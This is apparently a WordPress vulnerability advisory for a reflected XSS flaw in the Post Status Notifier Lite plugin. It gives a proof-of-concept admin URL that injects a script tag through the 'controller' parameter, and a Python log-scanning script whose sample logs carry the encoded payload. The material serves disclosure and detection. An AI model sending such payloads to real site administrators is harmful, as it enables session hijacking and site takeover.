wpexploit | Cydave | WPEX-ID:5B983C48-6B05-47CF-85CB-28BBEEC17395
History: Dec 15, 2022 - 12:00 a.m.

Post Status Notifier Lite < 1.10.1 - Reflected XSS

2022-12-15 00:00:00
cydave
59
post status notifier lite
reflected xss
exploit
url
logged in user
high privilege

EPSS: 0.001 (Low), percentile 50.1%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a reflected cross-site scripting (XSS) vulnerability that can be used against high-privilege users such as admins.

Make a logged-in, high-privilege user such as an admin open the URL below:

https://example.com/wp-admin/options-general.php?page=post-status-notifier-lite&controller=<script>alert(`xss`)</script>
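A log-triage check for the request pattern above, as an added example that is not part of the original advisory or the plugin's code: it flags requests to the plugin's settings page whose `controller` value is not a plain identifier. The allowlist pattern, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate `controller` values are short plain identifiers.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,64}")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLUGIN_PAGE = "post-status-notifier-lite"

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so the reported value is readable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_controller(log_line):
    """Return the decoded `controller` value if it is not a plain identifier."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if (not url.path.endswith("/wp-admin/options-general.php")
            or PLUGIN_PAGE not in params.get("page", [])):
        return None
    for raw in params.get("controller", []):
        if not SAFE_VALUE.fullmatch(raw):  # a leftover '%' also fails here
            return fully_decode(raw)
    return None

def scan(lines):
    """Return (line index, decoded value) for every flagged request."""
    hits = ((i, suspicious_controller(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in hits if v is not None]

# Constructed sample access-log lines (not real traffic).
_BASE = "/wp-admin/options-general.php?page=" + PLUGIN_PAGE
SAMPLE_LOG = [
    f'203.0.113.7 - - [15/Dec/2022:10:00:01 +0000] "GET {_BASE}&controller=example HTTP/1.1" 200 5123',
    f'203.0.113.9 - - [15/Dec/2022:10:02:44 +0000] "GET {_BASE}&controller=%3Cscript%3Ealert(%60xss%60)%3C/script%3E HTTP/1.1" 200 5301',
    f'203.0.113.9 - - [15/Dec/2022:10:03:10 +0000] "GET {_BASE}&controller=%253Cscript%253E HTTP/1.1" 200 5290',
    '198.51.100.4 - - [15/Dec/2022:10:05:00 +0000] "GET /wp-admin/options-general.php?page=other-plugin HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for idx, value in scan(SAMPLE_LOG):
        print(f"line {idx}: suspicious controller={value!r}")
```

A hit only shows that the URL was requested; the title marks versions below 1.10.1 as affected, so the installed plugin version decides whether the value was reflected unescaped.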
